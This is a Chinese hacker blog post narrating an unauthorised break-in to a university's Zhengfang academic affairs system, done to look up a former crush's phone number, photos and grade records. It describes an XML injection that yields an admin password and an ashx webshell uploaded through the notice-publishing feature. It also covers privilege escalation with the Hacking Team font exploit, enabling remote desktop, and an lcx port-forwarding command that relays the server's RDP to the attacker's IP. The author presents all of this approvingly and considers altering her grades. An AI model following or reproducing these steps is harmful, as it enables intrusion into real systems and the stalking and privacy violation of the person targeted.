正方教务漏洞服务器渗透寻找我逝去的青春

转眼又到高考，这一年来每晚梦到她，一晚不落。不说了，先换条内裤去、、、

我叫她猫，她叫我猪。我喊她妹妹，然后她会说：“我是猫，你是猪，咱俩有关系吗？”
我喜欢下课去洗脸，每次回来，她都会说：“呀，你怎么又一脸口水啊！”
她把兔子耳朵戴到我头上，然后狂笑。
她说，我有白头发的，然后我把手伸到她头发中狂翻……
只和我打我必输的赌，赌注是冰激凌。
然后，结束了。

说的有点远，现在可以回归主题了，在同学口中问道，她现在在XXX师范大学。提高女神、必然要搞掉教务处啊，电话照片要什么有什么！

正方教务漏洞

学校官网:Xxx.net， 目标（教务处）：xxx.xxx.net

正方教务系统，记得在sss看到一篇关于正方漏洞（正方教务系统post型xml注入）的文章，直接开搞拿到jwc01密码，过程不细说。

哈哈，权限齐全，查信息不在话下，女神来了，上图！

正方教务getshell

这就结束了吗？当然不可能，后台都进了，不getshell哪是我的作风呢！

在教务公告发布看到一处上传，各种折腾各种限制，我的宝贝马儿被截了一大半，后来查了一下资料，咱还有ashx的马呢，

在教务公告发布那里直接上传ashx文件来取得webshell。（会在同目录下生成asp的马）上传的文件后保存到/wbwj/这个目录中去，上传生成的asp马儿到wbwj文件夹下,访问测试。妥妥的，当然这里直接上传ashx的马也是可以的。

内网渗透提取

这就结束了吗？当然不可能，shell都拿了，不提权哪是我的作风呢！

上传一个aspxspy,执行命令，果然并不能/add, systeminfo成功执行，安装321个补丁，这可如何是好？懒得一个个的不定去看了，把手上的exp使劲往上丢，并没有什么卵用。洗洗睡，抱着女神照片来一发！

怎么人心放下，想起前几天在别的阅马场捡到的Hacking Team的利用字体提前的神器还没有试试呢。（代码分析及漏洞看这里http://drops.wooyun.org/papers/6998）

就是屌，账户添加成功，来个图。

多灾多难啊，3389没开，服务器在内网。一万匹草泥马奔腾，一个一个来吧。

上kai3389.exe成功执行，开3389端口。

上lcx.exe 端口转发链接，在本地执行 lcx.exe -listen 51 33891 在shell里执行lcx.exe -slave 你的IP 51 127.0.0.1 3389

艾玛，太卡，翻了半天找到成绩单，要不要给女神改改呢？

这就结束了吗？、、不然呢、约出来就不写了！